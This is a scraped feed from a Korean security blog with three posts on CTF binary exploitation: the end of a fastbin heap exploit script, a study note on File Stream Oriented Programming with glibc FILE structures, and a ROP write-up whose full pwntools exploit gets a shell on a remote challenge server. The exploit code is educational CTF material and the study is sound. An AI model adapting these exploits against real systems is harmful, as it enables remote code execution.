p.sendline(str(index)) alloc(0x20) #0 alloc(0x20) #1 alloc(0x20) #2 alloc(0x20) #3 alloc(0x80) #4 free(1) free(2) payload = p64(0)*5 payload += p64(0x31) payload += p64(0)*5 payload += p64(0x31) payload += p8(0xc0) fill(0,len(payload),payload) payload = p64(0)*5 payload += p64(0x31) fill(3, len(payload), payload) alloc(0x20) alloc(0x20) #same 2, 4 payload = p64(0)*5 payload += p64(0x91) fill(3, len(payload), payload) alloc(0x80) #5 alloc(0x80) #6 alloc(0x80) #7 free(4) free(6) dump(2) p.recvline() main_arena = u64(p.recv(8)) heap_base = u64(p.recv(8)) - 0x1e0 libc_base = main_arena - 0x3c4b78 print(hex(libc_base)) print(hex(heap_base)) one_shot = libc_base + 0x4526a malloc_hook = libc_base + malloc_hook alloc(0x80) alloc(0x80) alloc(0x68)#8 alloc(0x68)#9 alloc(0x68)#10 free(9) free(10) payload = p64(0)*13 payload += p64(0x71) payload += p64(0)*13 payload += p64(0x71) payload += p64(malloc_hook-35) #fd overwrite fill(8, len(payload), payload) alloc(0x68) #9 alloc(0x68) #10 #malloc_hook payload = &quot;\x00\x00\x00&quot;+p64(0)*2+p64(one_shot) fill(10, len(payload), payload) #one shot overwrite alloc(0xffff) p.interactive()</code></pre> pwnable/CTF write-up fastbin hacking heap pwnable ba0bab https://baobob1024.tistory.com/179 https://baobob1024.tistory.com/179#entry179comment Fri, 3 Jan 2020 22:00:12 +0900 https://baobob1024.tistory.com/176 <h3>Introduction</h3> <p>file struct 구조를 분석하여 <code>File Stream Oriented Programming</code>에 대해 공부한 내용을 정리하려 한다.</p> <h3>Data Structure in File</h3> <p>먼저, file 구조체를 알아야한다.</p> <pre><code class="language-c">struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */ char* _IO_read_ptr; /* Current read pointer */ char* _IO_read_end; /* End of get area. */ char* _IO_read_base; /* Start of putback+get area. */ char* _IO_write_base; /* Start of put area. */ char* _IO_write_ptr; /* Current put pointer. */ char* _IO_write_end; /* End of put area. */ char* _IO_buf_base; /* Start of reserve area. */ char* _IO_buf_end; /* End of reserve area. */ /* The following fields are used to support backing up and undo. */ char *_IO_save_base; /* Pointer to start of non-current get area. */ char *_IO_backup_base; /* Pointer to first valid character of backup area */ char *_IO_save_end; /* Pointer to end of non-current get area. */ struct _IO_marker *_markers; struct _IO_FILE *_chain; int _fileno; #if 0 int _blksize; #else int _flags2; #endif _IO_off_t _old_offset; /* This used to be _offset but it&#39;s too small. */ #define __HAVE_COLUMN /* temporary */ /* 1+column number of pbase(); 0 is unknown. */ unsigned short _cur_column; signed char _vtable_offset; char _shortbuf[1]; /* char* _save_gptr; char* _save_egptr; */ _IO_lock_t *_lock; #ifdef _IO_USE_OLD_IO_FILE };</code></pre> <p>libc에서, <code>__IO_FILE_</code> 구조체들은 모두 <code>단일 연결 리스트</code>로 연결 되어있다. </p> <p>포인터 <code>*_chain</code>은 리스트의 다음 <code>__IO_FILE</code>의 주소를 가지고 있다.</p> <p>연결 리스트의 꼭대기는 <code>__IO_list_all_</code>에 저장된다.</p> <p>일반적으로 링크된 layout은 다음과 같다.</p> <pre><code>0x7f0cc0434500 &lt;_IO_list_all&gt;: 0x00007f0cc0434520 0x0000000000000000 0x7f0cc0434510: 0x0000000000000000 0x0000000000000000 0x7f0cc0434520 &lt;_IO_2_1_stderr_&gt;: 0x00000000fbad2087 0x00007f0cc04345a3 0x7f0cc0434530 &lt;_IO_2_1_stderr_+16&gt;: 0x00007f0cc04345a3 0x00007f0cc04345a3 0x7f0cc0434540 &lt;_IO_2_1_stderr_+32&gt;: 0x00007f0cc04345a3 0x00007f0cc04345a3 0x7f0cc0434550 &lt;_IO_2_1_stderr_+48&gt;: 0x00007f0cc04345a3 0x00007f0cc04345a3 0x7f0cc0434560 &lt;_IO_2_1_stderr_+64&gt;: 0x00007f0cc04345a4 0x0000000000000000 0x7f0cc0434570 &lt;_IO_2_1_stderr_+80&gt;: 0x0000000000000000 0x0000000000000000 0x7f0cc0434580 &lt;_IO_2_1_stderr_+96&gt;: 0x0000000000000000 0x00007f0cc0434600 0x7f0cc0434590 &lt;_IO_2_1_stderr_+112&gt;: 0x0000000000000002 0xffffffffffffffff 0x7f0cc04345a0 &lt;_IO_2_1_stderr_+128&gt;: 0x0000000000000000 0x00007f0cc0435750 0x7f0cc04345b0 &lt;_IO_2_1_stderr_+144&gt;: 0xffffffffffffffff 0x0000000000000000 0x7f0cc04345c0 &lt;_IO_2_1_stderr_+160&gt;: 0x00007f0cc0433640 0x0000000000000000 0x7f0cc04345d0 &lt;_IO_2_1_stderr_+176&gt;: 0x0000000000000000 0x0000000000000000 0x7f0cc04345e0 &lt;_IO_2_1_stderr_+192&gt;: 0x0000000000000000 0x0000000000000000 0x7f0cc04345f0 &lt;_IO_2_1_stderr_+208&gt;: 0x0000000000000000 0x00007f0cc0430400 0x7f0cc0434600 &lt;_IO_2_1_stdout_&gt;: 0x00000000fbad2887 0x00007f0cc0434683 //And the data of _IO_2_1_stderr_ can be interpreted as: _flags = 0xfbad2087, _IO_read_ptr = 0x7f0cc04345a3, _IO_read_end = 0x7f0cc04345a3, _IO_read_base = 0x7f0cc04345a3, _IO_write_base = 0x7f0cc04345a3, _IO_write_ptr = 0x7f0cc04345a3, _IO_write_end = 0x7f0cc04345a3, _IO_buf_base = 0x7f0cc04345a3, _IO_buf_end = 0x7f0cc04345a4, _IO_save_base = 0x0, _IO_backup_base = 0x0, _IO_save_end = 0x0, _markers = 0x0, _chain = 0x7f0cc0434600, //point to _IO_2_1_stdout_ _fileno = 0x2, _flags2 = 0x0, _old_offset = 0xffffffffffffffff, _cur_column = 0x0, _vtable_offset = 0x0, _shortbuf = {0x0}, _lock = 0x7f0cc0435750, _offset = 0xffffffffffffffff, _codecvt = 0x0, _wide_data = 0x7f0cc0433640, _freeres_list = 0x0, _freeres_buf = 0x0, __pad5 = 0x0, _mode = 0x0, _unused2 = {0x0 &lt;repeats 20 times&gt;}</code></pre><p> <code>_IO_FILE</code>의 또 다른 중요한 구조체는 <code>__IO_FILE_plus_</code>이다.</p> <p>이것은 vtable(구조체 <code>__IO_jump_t_</code>와 같은) 을 유지시킨다. </p> <pre><code class="language-c">struct _IO_FILE_plus { _IO_FILE file; const struct _IO_jump_t *vtable; }; struct _IO_jump_t { JUMP_FIELD(size_t, __dummy); JUMP_FIELD(size_t, __dummy2); JUMP_FIELD(_IO_finish_t, __finish); JUMP_FIELD(_IO_overflow_t, __overflow); JUMP_FIELD(_IO_underflow_t, __underflow); JUMP_FIELD(_IO_underflow_t, __uflow); JUMP_FIELD(_IO_pbackfail_t, __pbackfail); /* showmany */ JUMP_FIELD(_IO_xsputn_t, __xsputn); JUMP_FIELD(_IO_xsgetn_t, __xsgetn); JUMP_FIELD(_IO_seekoff_t, __seekoff); JUMP_FIELD(_IO_seekpos_t, __seekpos); JUMP_FIELD(_IO_setbuf_t, __setbuf); JUMP_FIELD(_IO_sync_t, __sync); JUMP_FIELD(_IO_doallocate_t, __doallocate); JUMP_FIELD(_IO_read_t, __read); JUMP_FIELD(_IO_write_t, __write); JUMP_FIELD(_IO_seek_t, __seek); JUMP_FIELD(_IO_close_t, __close); JUMP_FIELD(_IO_stat_t, __stat); JUMP_FIELD(_IO_showmanyc_t, __showmanyc); JUMP_FIELD(_IO_imbue_t, __imbue); #if 0 get_column; set_column; #endif };</code></pre> <h3>Exploitation techniques</h3> <p>기본적인 부분만 정리를 해보려고 한다.<br>(심화 된 내용은 아래 레퍼런스를 참조.)</p> <p><code>fp를 이용한 fsop</code></p> <p><code>File *fp;</code> 의 값을 overwrite할 수 있다면, fake fp를 만들어 포인터 값을 옮기고 fake vtable으로 위치시켜 file stream 함수를 이용할때 프로그램의 실행 흐름을 control할 수 있다.</p> <pre><code>ba0bab➤ x/50gx 0x602010 0x602010: 0x00000000fbad2488 0x0000000000000000 0x602020: 0x0000000000000000 0x0000000000000000 0x602030: 0x0000000000000000 0x0000000000000000 0x602040: 0x0000000000000000 0x0000000000000000 0x602050: 0x0000000000000000 0x0000000000000000 0x602060: 0x0000000000000000 0x0000000000000000 0x602070: 0x0000000000000000 0x00007ffff7dd2540 0x602080: 0x0000000000000003 0x0000000000000000 0x602090: 0x0000000000000000 0x00000000006020f0 0x6020a0: 0xffffffffffffffff 0x0000000000000000 0x6020b0: 0x0000000000602100 0x0000000000000000 0x6020c0: 0x0000000000000000 0x0000000000000000 0x6020d0: 0x0000000000000000 0x0000000000000000 0x6020e0: 0x0000000000000000 0x00007ffff7dd06e0 0x6020f0: 0x0000000000000000 0x0000000000000000 0x602100: 0x0000000000000000 0x0000000000000000 0x602110: 0x0000000000000000 0x0000000000000000 0x602120: 0x0000000000000000 0x0000000000000000 0x602130: 0x0000000000000000 0x0000000000000000 0x602140: 0x0000000000000000 0x0000000000000000 0x602150: 0x0000000000000000 0x0000000000000000 0x602160: 0x0000000000000000 0x0000000000000000 0x602170: 0x0000000000000000 0x0000000000000000 0x602180: 0x0000000000000000 0x0000000000000000 0x602190: 0x0000000000000000 0x0000000000000000 ba0bab➤ </code></pre><p>fake fp구조체에서 <code>0x602098</code>위치 (구조체에서 <code>_cur_column</code>)에 0을 가르키고 있는 주소로 세팅해주고</p> <p><code>0x6020e8</code>위치(<code>_IO_file_jumps</code>)에 fake vtable의 주소를 세팅해준다. </p> <p>그리고 이제 fake vtable(== fake _IO_file_jumps )에서 원하는 부분을 원하는 걸로 바꿔주면 된다.</p> <p>예를 들어서, 만약 <code>_IO_file_jumps</code> 구조체 에서 <code>__GI__IO_file_close</code>를 원샷이나 system으로 덮고 fclose(fp)를 콜하면 실행 될 것이다!</p> <h3>Reference</h3> <ul> <li><a href="https://dangokyo.me/2018/01/01/advanced-heap-exploitation-file-stream-oriented-programming/">https://dangokyo.me/2018/01/01/advanced-heap-exploitation-file-stream-oriented-programming/</a></li> </ul> <p>문서 좋은 것 같다! 더 공부해봐야겠다.</p> pwnable/정리 fsop pwnable 해킹 ba0bab https://baobob1024.tistory.com/176 https://baobob1024.tistory.com/176#entry176comment Sun, 22 Dec 2019 04:08:13 +0900 https://baobob1024.tistory.com/175 <h3>Summary</h3> <ul> <li>only read</li> <li>rax control</li> <li>read내부 syscall 이용</li> </ul> <h3>Analysis</h3> <pre class="cpp"><code>int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+0h] [rbp-30h] alarm(0x3Cu); read(0, &amp;buf, 0x400uLL); return 0; }</code></pre> <p>stack overflow가 발생한다.</p> <p>하지만 writeable한 함수는 없고,</p> <p>오직 read함수만 있기때문에 일반적인 rop로는 풀이가 불가능하다.</p> <p>&nbsp;</p> <blockquote> <p>Use syscall(in libc_read)</p> </blockquote> <p>따라서 이 문제를 풀기 위해서는 read내부에 있는 syscall을 이용해야 한다.</p> <pre class="x86asm"><code>ba0bab➤ disas read Dump of assembler code for function read: 0x00007ffff7b04250 &lt;+0&gt;: cmp DWORD PTR [rip+0x2d24e9],0x0 # 0x7ffff7dd6740 &lt;__libc_multiple_threads&gt; 0x00007ffff7b04257 &lt;+7&gt;: jne 0x7ffff7b04269 &lt;read+25&gt; 0x00007ffff7b04259 &lt;+0&gt;: mov eax,0x0 0x00007ffff7b0425e &lt;+5&gt;: syscall =&gt; 0x00007ffff7b04260 &lt;+7&gt;: cmp rax,0xfffffffffffff001 0x00007ffff7b04266 &lt;+13&gt;: jae 0x7ffff7b04299 &lt;read+73&gt; 0x00007ffff7b04268 &lt;+15&gt;: ret 0x00007ffff7b04269 &lt;+25&gt;: sub rsp,0x8 0x00007ffff7b0426d &lt;+29&gt;: call 0x7ffff7b220d0 &lt;__libc_enable_asynccancel&gt; 0x00007ffff7b04272 &lt;+34&gt;: mov QWORD PTR [rsp],rax 0x00007ffff7b04276 &lt;+38&gt;: mov eax,0x0 0x00007ffff7b0427b &lt;+43&gt;: syscall 0x00007ffff7b0427d &lt;+45&gt;: mov rdi,QWORD PTR [rsp] 0x00007ffff7b04281 &lt;+49&gt;: mov rdx,rax 0x00007ffff7b04284 &lt;+52&gt;: call 0x7ffff7b22130 &lt;__libc_disable_asynccancel&gt; 0x00007ffff7b04289 &lt;+57&gt;: mov rax,rdx 0x00007ffff7b0428c &lt;+60&gt;: add rsp,0x8 0x00007ffff7b04290 &lt;+64&gt;: cmp rax,0xfffffffffffff001 0x00007ffff7b04296 &lt;+70&gt;: jae 0x7ffff7b04299 &lt;read+73&gt; 0x00007ffff7b04298 &lt;+72&gt;: ret 0x00007ffff7b04299 &lt;+73&gt;: mov rcx,QWORD PTR [rip+0x2ccbd8] # 0x7ffff7dd0e78 0x00007ffff7b042a0 &lt;+80&gt;: neg eax 0x00007ffff7b042a2 &lt;+82&gt;: mov DWORD PTR fs:[rcx],eax 0x00007ffff7b042a5 &lt;+85&gt;: or rax,0xffffffffffffffff 0x00007ffff7b042a9 &lt;+89&gt;: ret </code></pre> <p>read 어셈 코드이다.</p> <p>보면 read + 5가 syscall을 나타내는 것을 알 수 있다.</p> <p>read@got안에 libc read주소가 있으니 마지막 1byte를 0x50이 아닌 0x5e로 overwrite하게 되면</p> <p>read@plt를 호출했을 때 syscall을 부를 수 있게 된다!</p> <p>&nbsp;</p> <blockquote> <p>syscall 불러서 뭐하지?</p> </blockquote> <p>rax를 바로 59로 control할 수 있다면 execve()를 호출 할 수 있다.</p> <p><code>/bin/sh\x00</code>를 bss에 적어두고 execve()호출하면 끝이지만,,(이 문제는 이렇게 안품)</p> <p>이 문제에선 <code>pop rax</code>와 같은 가젯은 없었다. (trust 2018 start, hackctf에 있는 문제와 조금 달랐던 점.)</p> <p>그래서 어떻게 rax를 컨트롤할지 생각하다가</p> <p>&nbsp;</p> <p>팀마다 힌트 준다길래 물어봤더니 read로 입력받는 문자열의 길이로</p> <p>rax를 control해야 함을 알고</p> <p>&nbsp;</p> <p>0x50이 아닌 0x5e로 1byte overwrite할 때 rax가 1이므로 이 때 syscall을 호출하면</p> <p>sys_write가 호출되고, 이를 사용하여 libc_base를 leak해서 oneshot으로 풀었다.</p> <h3>Exploit</h3> <pre class="arduino"><code>from pwn import * #s = process("./problem") s = remote("34.85.27.24", 7777) libc = ELF("libc.so.6") e = ELF("problem") context.log_level = 'debug' prdi = 0x400603 prsi_r15 = 0x400601 payload = "A"*0x30 + "BBBBBBBB" payload += p64(prsi_r15) payload += p64(e.got['read']) payload += p64(0) payload += p64(e.plt['read']) payload += p64(prdi) payload += p64(1) payload += p64(prsi_r15) payload += p64(e.got['read']) payload += p64(0) payload += p64(e.plt['read']) payload += p64(e.symbols['main']) print(len(payload)) s.send(payload) s.send('\x5e') read = u64(s.recv(6)+"\x00\x00") libc_base = read - 0xf7250-0xe magic = libc_base + 0x4526a print(hex(read)) print(hex(libc_base)) payload = "A"*0x30+"BBBBBBBB" payload += p64(magic) s.send(payload) s.interactive()</code></pre> <pre class="elixir"><code>root@ubuntu:~/hacking/ctf/hshacker2/pwn/simple# python exploit.py [+] Opening connection to 34.85.27.24 on port 7777: Done [*] '/root/hacking/ctf/hshacker2/pwn/simple/libc.so.6' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] '/root/hacking/ctf/hshacker2/pwn/simple/problem' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 144 0x7f44f592725e 0x7f44f5830000 [*] Switching to interactive mode $ cat flag FLAG{HINA_Plz_Make_The_World_Bright} $ </code></pre> <p>&nbsp;</p> <p>&nbsp;</p> pwnable/CTF write-up hacking pwnable ba0bab https://baobob1024.tistory.com/175 https://baobob1024.tistory.com/175#entry175comment Sun, 1 Dec 2019 16:17:20 +0900